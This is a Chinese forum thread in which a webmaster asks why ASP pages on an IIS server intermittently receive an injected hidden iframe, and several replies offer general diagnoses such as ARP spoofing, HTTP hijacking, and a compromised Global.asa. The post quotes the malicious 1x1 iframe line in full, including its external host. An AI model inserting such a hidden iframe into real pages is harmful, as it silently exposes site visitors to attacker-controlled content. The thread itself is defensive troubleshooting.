日期:2014-05-17  浏览次数:20643 次

到底是ARP欺骗还是IIS中毒,还是其它原因?
03系统,IIS,ASP网站。
现在所有站点的ASP页面被访问时,打开10次左右,就会有一次在文件一开始插入一个代码。<iframe src= http://2345kic30d.3322.org:5188/index.html?id=112 width=1 height=1></iframe>

查了程序代码里没有被插入这段,也没有被改过。问了机房他们说不是ARP欺骗

到底是什么问题?怎么解决?头都大了。


------解决方案--------------------
不太懂这个,还是等高人帮你解决吧。 
------解决方案--------------------
检查过 Global.asa 这个文件了吗? 
------解决方案--------------------
有可能是服务器内部被人改了代码,可以在dreamwaver里面搜索整个目录下的文本类型文件,看是否包含http://2345kic30d.3322.org:5188/index.html这个值,如果是你服务器被人动了多半是能搜得到的。找不到的话可以把源码考到另一台机器上跑跑看,看是不是还是出那种问题,对比起来就好找问题出在哪里了。
另外如果你那个确定不是服务器的问题的话也有可能是http会话劫持。
------解决方案--------------------
这还真没见到过,就帮顶下吧。。。
------解决方案--------------------
被人挂马了吧!!!!
------解决方案--------------------
在公司员工计算机上遇到过类似的问题。经分析,发现有2个层面的原因,正如楼主所述。
1、先是员工计算机中了ARP欺骗类病毒,导致整个楼层(同一子网)上网时断时续。经检查该子网的网关MAC地址被该员工计算机冒用。
2、再是这些子网内的计算机上,有些网站能打开有些打不开。后来发现打不开是因为该网站对插入的HTTP代码存在兼容性问题而无法运行。这其实就是所谓的HTTP劫持。

~所以,楼主说的两个问题可能同时存在。建议先重点检查一下出问题的计算机所在的网段的ARP欺骗问题。找出那台捣乱的计算机,再继续观察。